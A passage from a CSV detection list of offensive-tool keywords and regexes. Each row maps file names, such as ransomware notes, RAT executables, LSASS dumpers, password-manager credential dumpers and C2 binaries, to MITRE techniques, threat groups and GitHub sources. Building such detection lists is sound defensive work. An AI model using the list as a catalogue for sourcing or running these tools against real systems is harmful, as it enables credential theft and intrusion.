tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13695" "*\\Windows\\Temp\\Results.txt*",".{0,1000}\\\\Windows\\\\Temp\\\\Results\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","13696" "*\\windows\\temp\\sam.tmp*",".{0,1000}\\\\windows\\\\temp\\\\sam\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13697" "*\\windows\\temp\\sys.tmp*",".{0,1000}\\\\windows\\\\temp\\\\sys\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13698" "*\\Windows\\Temp\\Yanri_res.rc*",".{0,1000}\\\\Windows\\\\Temp\\\\Yanri_res\.rc.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","13699" "*\__output 2^>^&1 
>*",".{0,1000}\\__output\s2\^\>\^\&1\s\>.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13700" "*\__output 2>&1 >*",".{0,1000}\\__output\s2\>\&1\s\>.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13701" "*\_Locky_recover_instructions.txt*",".{0,1000}\\_Locky_recover_instructions\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13702" "*\_READ_THIS_FILE_HBE8_.txt*",".{0,1000}\\_READ_THIS_FILE_HBE8_\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13703" "*\+README-WARNING+.txt*",".{0,1000}\\\+README\-WARNING\+\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13704" "*\0nly1 RAT 
*\Client.exe*",".{0,1000}\\0nly1\sRAT\s.{0,1000}\\Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13705" "*\0nly1 RAT *\Server.exe *",".{0,1000}\\0nly1\sRAT\s.{0,1000}\\Server\.exe\s.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13706" "*\1$a$$.exe*",".{0,1000}\\1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","13707" "*\1.6-C2-main.zip*",".{0,1000}\\1\.6\-C2\-main\.zip.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","13708" "*\1.Encrypt_shellcode*",".{0,1000}\\1\.Encrypt_shellcode.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as 
shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","13711" "*\1_6_C2.exe*",".{0,1000}\\1_6_C2\.exe.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","13713" "*\10m_usernames.txt*",".{0,1000}\\10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","13714" "*\127.0.0.1/pipe/coerced*",".{0,1000}\\127\.0\.0\.1\/pipe\/coerced.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","13715" "*\1n73ction.php*",".{0,1000}\\1n73ction\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13717" "*\1password\app\FindsecondPID1password.h*",".{0,1000}\\1password\\app\\FindsecondPID1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that 
assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13718" "*\1password\app\getCreds1passwordappEntries1.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13719" "*\1password\app\getCreds1passwordappEntries2.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13720" "*\1password\app\getCreds1passwordappMaster.h*",".{0,1000}\\1password\\app\\getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13721" "*\1password\app\getProcUAC1password.h*",".{0,1000}\\1password\\app\\getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - 
TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13722" "*\1password\plugin\getCreds1passwordplugin.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13723" "*\1password\plugin\getCreds1passwordplugin2.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13724" "*\2023*.shareaudit*",".{0,1000}\\2023.{0,1000}\.shareaudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","13728" "*\2024*.shareaudit*",".{0,1000}\\2024.{0,1000}\.shareaudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","13729" 
"*\2024-*_Recall_Extraction\*",".{0,1000}\\2024\-.{0,1000}_Recall_Extraction\\.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","13730" "*\2025*.shareaudit*",".{0,1000}\\2025.{0,1000}\.shareaudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","13731" "*\2025-*_Recall_Extraction\*",".{0,1000}\\2025\-.{0,1000}_Recall_Extraction\\.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","13732" "*\2fac5c2a114c7896c33fb2b0a9f6443d\*",".{0,1000}\\2fac5c2a114c7896c33fb2b0a9f6443d\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","13733" "*\523XaDi1i.README.txt*",".{0,1000}\\523XaDi1i\.README\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13750" "*\888 RAT Private .exe*",".{0,1000}\\888\sRAT\sPrivate\s\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13760" "*\8base_note.txt*",".{0,1000}\\8base_note\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13761" "*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*",".{0,1000}\\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","13762" "*\a\1\s\x64\Release\ProcDump64.pdb*",".{0,1000}\\a\\1\\s\\x64\\Release\\ProcDump64\.pdb.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","13766" "*\A7m3d Rat 
V.*.exe*",".{0,1000}\\A7m3d\sRat\sV\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13767" "*\AAA_READ_AAA.TXT*",".{0,1000}\\AAA_READ_AAA\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13771" "*\AbandonedCOMKeys.*",".{0,1000}\\AbandonedCOMKeys\..{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). 
Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13773" "*\ABPTTS-master*",".{0,1000}\\ABPTTS\-master.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","13774" "*\accounts_passdontexpire.txt*",".{0,1000}\\accounts_passdontexpire\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","13775" "*\Ace RAT v*\Server.exe*",".{0,1000}\\Ace\sRAT\sv.{0,1000}\\Server\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13776" "*\ACE_Get-KerberosTicketCache.ps1*",".{0,1000}\\ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13777" 
"*\AceRAT-Client.exe*",".{0,1000}\\AceRAT\-Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13778" "*\ACEshark.log*",".{0,1000}\\ACEshark\.log.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#logfile","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","13779" "*\ACEshark.py*",".{0,1000}\\ACEshark\.py.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","13780" "*\AD_Miner-*",".{0,1000}\\AD_Miner\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","13789" "*\ADAPE.ps1*",".{0,1000}\\ADAPE\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege 
Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","13791" "*\AdapticClient.exe*",".{0,1000}\\AdapticClient\.exe.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","13792" "*\adaptiveC2.py*",".{0,1000}\\adaptiveC2\.py.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","13793" "*\ADAudit.ps1*",".{0,1000}\\ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","13794" "*\ADcheck.py*",".{0,1000}\\ADcheck\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","13796" "*\ADcheck\Scripts\activate*",".{0,1000}\\ADcheck\\Scripts\\activate.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","13797" "*\ADcheck-main*",".{0,1000}\\ADcheck\-main.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","13798" "*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","13799" "*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","13800" "*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
